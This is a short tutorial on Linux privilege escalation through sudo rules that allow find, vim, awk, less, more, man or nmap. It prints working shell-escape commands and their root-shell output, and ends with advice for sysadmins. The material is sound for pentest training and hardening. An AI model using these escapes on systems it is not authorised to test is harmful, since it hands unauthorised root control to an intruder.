Exploiting SUDO for Linux privilege escalation

Abusing SUDO for fun and profit!

The SUDO (Substitute User and Do) command allows users to delegate privileges resources: users can execute specific commands under other users (also root) using their own passwords instead of user’s one or without password depending upon setting in /etc/sudoers file.

For more information about sudoers configuration, please refers to official documentation.

So, if during a pentest you has been able to obtain a shell without root privileges, you could try to perform a privilege escalation using SUDO, exploiting some functionality of applications allowed to be executed under SUDO.

In order to exploiting sudo users, first you need to find which commands current user is allowed, using the sudo -l command:

andrea@viserion:~$ sudo -l
Matching Defaults entries for andrea on viserion:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User andrea may run the following commands on viserion:
 (root) NOPASSWD: /usr/bin/find
 (root) NOPASSWD: /usr/bin/vim
 (root) NOPASSWD: /usr/bin/awk

In this case, three command are allowed to be executed with root permissions, so we can try to obtain a privileged shell using some features of this commands.

For example, we can exploit the -exec paramether of find command:

andrea@viserion:~$ sudo find /etc/passwd -exec /bin/sh \;
# whoami
root
#

or the -c paramether of vim:

andrea@viserion:~$ sudo vim -c '!sh'
# whoami
root
#

Also awk allows the invocation of a shell:

andrea@viserion:~$ sudo awk 'BEGIN {system("/bin/sh")}'
# whoami
root
#

and less, more and man allows command execution:

 MISCELLANEOUS COMMANDS

-<flag> Toggle a command line option [see OPTIONS below].
 --<name> Toggle a command line option, by name.
 _<flag> Display the setting of a command line option.
 __<name> Display the setting of an option, by name.
 +cmd Execute the less cmd each time a new file is examined.

!command Execute the shell command with $SHELL.
 |Xcommand Pipe file between current pos & mark X to shell command.
 v Edit the current file with $VISUAL or $EDITOR.
 V Print version number of "less".

so, simply call

sudo less /etc/hosts
or
sudo more /etc/hosts
or
sudo man ls

the press !sh and hit enter.

Finally, e more laborious approach using a custom Nmap NSE script:

andrea@viserion:~$ echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Starting Nmap 6.40 ( http://nmap.org ) at 2018-04-24 10:41 DST
# whoami
root
#

A lot of other tools allows command execution, and this tools could be included in sudo configuration.

Basically, imagination is the only limit: sysadmins should frequently double check the sudoers configuration, in order to avoid this kind of privilege escalations.

---

References and further readings

• • Sudoers Manual
  • HowTO: Sudoers Configuration on Ubuntu Forums
  • Nmap Scripting Engine

feature image from https://xkcd.com/149/